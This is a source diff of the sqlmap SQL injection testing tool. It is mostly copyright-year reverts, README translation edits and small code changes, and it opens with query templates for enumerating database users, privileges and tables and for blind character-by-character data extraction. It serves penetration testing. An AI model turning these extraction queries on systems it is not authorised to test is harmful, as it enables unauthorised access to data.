<cast query="CAST(%s AS String)"/>
<length query="length(%s)"/>
<isnull query="ifNull(%s, '')"/>
<delimiter query="||"/>
<limit query="LIMIT %d OFFSET %d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="2"/>
<limitgroupstop query="1"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--" query2="//"/>
<substring query="substring(%s,%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<inference query="substring((%s),%d,1)>'%c'" />
<banner query="select version()"/>
<current_user query="currentUser()"/>
<current_db query="currentDatabase()"/>
<hostname query="hostName()"/>
<table_comment/>
<column_comment/>
<is_dba query="(SELECT access_type FROM system.grants WHERE user_name=currentUser())='ALL'"/>
<check_udf/>
<users>
<inband query="SELECT name FROM system.users"/>
<blind query="SELECT name FROM system.users LIMIT %d,1" count="SELECT COUNT(name) FROM system.users"/>
</users>
<passwords/>
<privileges>
<inband query="SELECT DISTINCT user_name,access_type FROM system.grants" condition="user_name"/>
<blind query="SELECT DISTINCT(access_type) FROM system.grants WHERE user_name='%s' ORDER BY access_type LIMIT %d,1" count="SELECT COUNT(DISTINCT(access_type)) FROM system.grants WHERE user_name='%s'"/>
</privileges>
<roles>
<inband query="SELECT DISTINCT user_name,role_name FROM system.role_grants" condition="user_name"/>
<blind query="SELECT DISTINCT(role_name) FROM system.role_grants WHERE user_name='%s' ORDER BY role_name LIMIT %d,1" count="SELECT COUNT(DISTINCT(role_name)) FROM system.role_grants WHERE user_name='%s'"/>
</roles>
<statements/>
<dbs>
<inband query="SELECT schema_name FROM information_schema.schemata"/>
<blind query="SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(schema_name) FROM information_schema.schemata"/>
</dbs>
<tables>
<inband query="SELECT table_schema,table_name FROM information_schema.tables" condition="table_schema"/>
<blind query="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
</tables>
<columns>
<inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d,1" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1 " count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_table>
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
</search_table>
<search_column>
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
</search_column>
<search_db>
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
<blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
</search_db>
</dbms>
<dbms value="CrateDB">
<cast query="CAST(%s AS TEXT)"/>
<length query="CHAR_LENGTH((%s)::text)"/>

5
doc/CHANGELOG.md
View File

@@ -1,8 +1,3 @@
# Version 1.7 (2022-01-02)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
# Version 1.6 (2022-01-03)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)

24
doc/translations/README-fa-IR.md
View File

@@ -7,10 +7,10 @@
برنامه `sqlmap`، یک برنامه‌ی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر می‌کند.
برنامه `sqlmap`، برنامه‌ی منبع باز هست که برای تست نفوذ پذیزی دربرابر حمله‌های احتمالی `sql injection` (جلوگیری از لو رفتن پایگاه داده) جلو گیری می‌کند. این برنامه مجهز به مکانیزیم تشخیص قدرتمندی می‌باشد. همچنین داری طیف گسترده‌ای از اسکریپت ها می‌باشد که برای متخصص تست نفوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق `via out-of-band` درسیستم عامل را امکان پذیر می‌کند.
تصویر محیط ابزار
عکس
----
@@ -23,7 +23,7 @@
<div dir=rtl>
برای نمایش [مجموعه ای از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از دانشنامه دیدن کنید.
برای دیدن کردن از [مجموعهی از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از ویکی دیدن کنید.
نصب
@@ -32,11 +32,11 @@
برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید.
نحوه استفاده
طرز استفاده
----
برای دریافت لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید:
برای گرفتن لیست ارگومان‌های اساسی می‌توانید از دستور زیر استفاده کنید:
@@ -53,7 +53,7 @@
<div dir=rtl>
برای دریافت لیست تمامی ارگومان‌ها می‌توانید از دستور زیر استفاده کنید:
برای گرفتن لیست تمامی ارگومان‌های می‌توانید از دستور زیر استفاده کنید:
<div dir=ltr>
@@ -66,7 +66,7 @@
<div dir=rtl>
برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می‌ توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
برای اطلاعات بیشتر برای اجرا از [اینجا](https://asciinema.org/a/46601) می‌توانید استفاده کنید. برای گرفتن اطلاعات بیشتر توسعه می‌شود به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
لینک‌ها
@@ -74,11 +74,11 @@
* خانه: https://sqlmap.org
* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* کایمت و نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* پیگری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki
* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* توییتر: [@sqlmap](https://twitter.com/sqlmap)
* تویتر: [@sqlmap](https://twitter.com/sqlmap)
* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
* عکس‌ها: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

49
doc/translations/README-ka-GE.md
View File

@@ -1,49 +0,0 @@
# sqlmap ![](https://i.imgur.com/fe85aVR.png)
[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის.
ეკრანის ანაბეჭდები
----
![ეკრანის ანაბეჭდი](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია.
ინსტალაცია
----
თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით.
ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან.
გამოყენება
----
ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
python sqlmap.py -h
ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
python sqlmap.py -hh
გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
ბმულები
----
* საწყისი გვერდი: https://sqlmap.org
* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues
* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki
* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

2
extra/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/beep/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/beep/beep.py
View File

@@ -3,7 +3,7 @@
"""
beep.py - Make a beep sound
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/cloak/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

4
extra/cloak/cloak.py
View File

@@ -3,7 +3,7 @@
"""
cloak.py - Simple file encryption/compression utility
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
xrange = range
ord = lambda _: _
KEY = b"E6wRbVhD0IBeCiGJ"
KEY = b"ENWsCymUeJcXqSbD"
def xor(message, key):
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))

2
extra/dbgtool/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/dbgtool/dbgtool.py
View File

@@ -3,7 +3,7 @@
"""
dbgtool.py - Portable executable to ASCII debug script converter
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

BIN
extra/icmpsh/icmpsh.exe_
View File

Binary file not shown.

BIN
extra/runcmd/runcmd.exe_
View File

Binary file not shown.

BIN
extra/shellcodeexec/linux/shellcodeexec.x32_
View File

Binary file not shown.

BIN
extra/shellcodeexec/linux/shellcodeexec.x64_
View File

Binary file not shown.

BIN
extra/shellcodeexec/windows/shellcodeexec.x32.exe_
View File

Binary file not shown.

2
extra/shutils/blanks.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes trailing spaces from blank lines inside project files

2
extra/shutils/drei.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Stress test against Python3

2
extra/shutils/duplicates.py
View File

@@ -1,6 +1,6 @@
#!/usr/bin/env python
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes duplicate entries in wordlist like files

2
extra/shutils/junk.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null

2
extra/shutils/modernize.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# sudo pip install modernize

2
extra/shutils/pycodestyle.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)

2
extra/shutils/pydiatra.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs py3diatra on all python files (prerequisite: pip install pydiatra)

2
extra/shutils/pyflakes.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)

2
extra/shutils/pylint.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \;

4
extra/shutils/pypi.sh
View File

@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -67,7 +67,7 @@ cat > sqlmap/__init__.py << EOF
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/vulnserver/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

5
extra/vulnserver/vulnserver.py
View File

@@ -3,7 +3,7 @@
"""
vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -44,8 +44,7 @@ SCHEMA = """
CREATE TABLE users (
id INTEGER,
name TEXT,
surname TEXT,
PRIMARY KEY (id)
surname TEXT
);
INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');

2
lib/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
lib/controller/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
lib/controller/action.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

59
lib/controller/checks.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -10,6 +10,7 @@ import logging
import random
import re
import socket
import subprocess
import time
from extra.beep.beep import beep
@@ -270,18 +271,15 @@ def checkSqlInjection(place, parameter, value):
logger.debug(debugMsg)
continue
elif kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
debugMsg = "skipping test '%s' because " % title
debugMsg += "its declared DBMS is different than provided"
logger.debug(debugMsg)
continue
elif kb.reduceTests == False:
pass
# Skip DBMS-specific test if it does not match the
# previously identified DBMS (via DBMS-specific payload)
elif injection.dbms and not intersect(payloadDbms, injection.dbms, True):
if injection.dbms and not intersect(payloadDbms, injection.dbms, True):
debugMsg = "skipping test '%s' because " % title
debugMsg += "its declared DBMS is different than identified"
logger.debug(debugMsg)
@@ -289,7 +287,7 @@ def checkSqlInjection(place, parameter, value):
# Skip DBMS-specific test if it does not match the
# previously identified DBMS (via DBMS-specific error message)
elif kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
debugMsg = "skipping test '%s' because the heuristic " % title
debugMsg += "tests showed that the back-end DBMS "
debugMsg += "could be '%s'" % unArrayizeValue(kb.reduceTests)
@@ -782,9 +780,23 @@ def checkSqlInjection(place, parameter, value):
injection.conf.regexp = conf.regexp
injection.conf.optimize = conf.optimize
if not kb.alerted:
if conf.beep:
beep()
if conf.alert:
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
logger.info(infoMsg)
try:
process = subprocess.Popen(conf.alert, shell=True)
process.wait()
except Exception as ex:
errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex))
logger.error(errMsg)
kb.alerted = True
# There is no need to perform this test for other
# <where> tags
break
@@ -798,7 +810,7 @@ def checkSqlInjection(place, parameter, value):
except KeyboardInterrupt:
warnMsg = "user aborted during detection phase"
logger.warning(warnMsg)
logger.warn(warnMsg)
if conf.multipleTargets:
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
@@ -814,7 +826,7 @@ def checkSqlInjection(place, parameter, value):
choice = None
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
if choice:
logger.warning("invalid value")
logger.warn("invalid value")
msg = "enter new verbosity level: [0-6] "
choice = readInput(msg, default=str(conf.verbose), checkBatch=False)
conf.verbose = int(choice)
@@ -839,13 +851,15 @@ def checkSqlInjection(place, parameter, value):
warnMsg = "in OR boolean-based injection cases, please consider usage "
warnMsg += "of switch '--drop-set-cookie' if you experience any "
warnMsg += "problems during data retrieval"
logger.warning(warnMsg)
logger.warn(warnMsg)
if not checkFalsePositives(injection):
if conf.hostname in kb.vulnHosts:
kb.vulnHosts.remove(conf.hostname)
if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
else:
injection = None
@@ -962,7 +976,7 @@ def checkFalsePositives(injection):
if not retVal:
warnMsg = "false positive or unexploitable injection point detected"
logger.warning(warnMsg)
logger.warn(warnMsg)
kb.injection = popValue()
@@ -988,7 +1002,7 @@ def checkSuhosinPatch(injection):
warnMsg = "parameter length constraining "
warnMsg += "mechanism detected (e.g. Suhosin patch). "
warnMsg += "Potential problems in enumeration phase can be expected"
logger.warning(warnMsg)
logger.warn(warnMsg)
kb.injection = popValue()
@@ -1009,7 +1023,7 @@ def checkFilteredChars(injection):
warnMsg += "filtered by the back-end server. There is a strong "
warnMsg += "possibility that sqlmap won't be able to properly "
warnMsg += "exploit this vulnerability"
logger.warning(warnMsg)
logger.warn(warnMsg)
# inference techniques depend on character '>'
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
@@ -1017,7 +1031,7 @@ def checkFilteredChars(injection):
warnMsg = "it appears that the character '>' is "
warnMsg += "filtered by the back-end server. You are strongly "
warnMsg += "advised to rerun with the '--tamper=between'"
logger.warning(warnMsg)
logger.warn(warnMsg)
kb.injection = popValue()
@@ -1108,7 +1122,7 @@ def heuristicCheckSqlInjection(place, parameter):
else:
infoMsg += "not be injectable"
logger.warning(infoMsg)
logger.warn(infoMsg)
kb.heuristicMode = True
kb.disableHtmlDecoding = True
@@ -1216,7 +1230,7 @@ def checkDynamicContent(firstPage, secondPage):
if count > conf.retries:
warnMsg = "target URL content appears to be too dynamic. "
warnMsg += "Switching to '--text-only' "
logger.warning(warnMsg)
logger.warn(warnMsg)
conf.textOnly = True
return
@@ -1274,7 +1288,7 @@ def checkStability():
warnMsg += "injectable parameters are detected, or in case of "
warnMsg += "junk results, refer to user's manual paragraph "
warnMsg += "'Page comparison'"
logger.warning(warnMsg)
logger.warn(warnMsg)
message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
choice = readInput(message, default='C').upper()
@@ -1353,10 +1367,11 @@ def checkWaf():
retVal = False
payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)
place = PLACE.GET
if PLACE.URI in conf.parameters:
place = PLACE.POST
value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
else:
place = PLACE.GET
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
@@ -1499,7 +1514,7 @@ def checkConnection(suppressOutput=False):
warnMsg = "you provided '%s' as the string to " % conf.string
warnMsg += "match, but such a string is not within the target "
warnMsg += "URL raw response, sqlmap will carry on anyway"
logger.warning(warnMsg)
logger.warn(warnMsg)
if conf.regexp:
infoMsg = "testing if the provided regular expression matches within "
@@ -1510,7 +1525,7 @@ def checkConnection(suppressOutput=False):
warnMsg = "you provided '%s' as the regular expression " % conf.regexp
warnMsg += "which does not have any match within the target URL raw response. sqlmap "
warnMsg += "will carry on anyway"
logger.warning(warnMsg)
logger.warn(warnMsg)
kb.errorIsNone = False
@@ -1525,12 +1540,12 @@ def checkConnection(suppressOutput=False):
elif wasLastResponseDBMSError():
warnMsg = "there is a DBMS error found in the HTTP response body "
warnMsg += "which could interfere with the results of the tests"
logger.warning(warnMsg)
logger.warn(warnMsg)
elif wasLastResponseHTTPError():
if getLastRequestHTTPError() not in (conf.ignoreCode or []):
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
warnMsg += "which could interfere with the results of the tests"
logger.warning(warnMsg)
logger.warn(warnMsg)
else:
kb.errorIsNone = True

45
lib/controller/controller.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -9,7 +9,6 @@ from __future__ import division
import os
import re
import subprocess
import time
from lib.controller.action import action
@@ -187,12 +186,12 @@ def _showInjections():
if conf.tamper:
warnMsg = "changes made by tampering scripts are not "
warnMsg += "included in shown payload content(s)"
logger.warning(warnMsg)
logger.warn(warnMsg)
if conf.hpp:
warnMsg = "changes made by HTTP parameter pollution are not "
warnMsg += "included in shown payload content(s)"
logger.warning(warnMsg)
logger.warn(warnMsg)
def _randomFillBlankFields(value):
retVal = value
@@ -512,23 +511,6 @@ def start():
testSqlInj = True
paramKey = (conf.hostname, conf.path, place, parameter)
if kb.processUserMarks:
if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
if kb.processNonCustom is None:
message = "other non-custom parameters found. "
message += "Do you want to process them too? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
else:
kb.processNonCustom = choice == 'Y'
if not kb.processNonCustom:
infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
continue
if paramKey in kb.testedParams:
testSqlInj = False
@@ -574,7 +556,7 @@ def start():
if not check:
warnMsg = "%sparameter '%s' does not appear to be dynamic" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.warning(warnMsg)
logger.warn(warnMsg)
if conf.skipStatic:
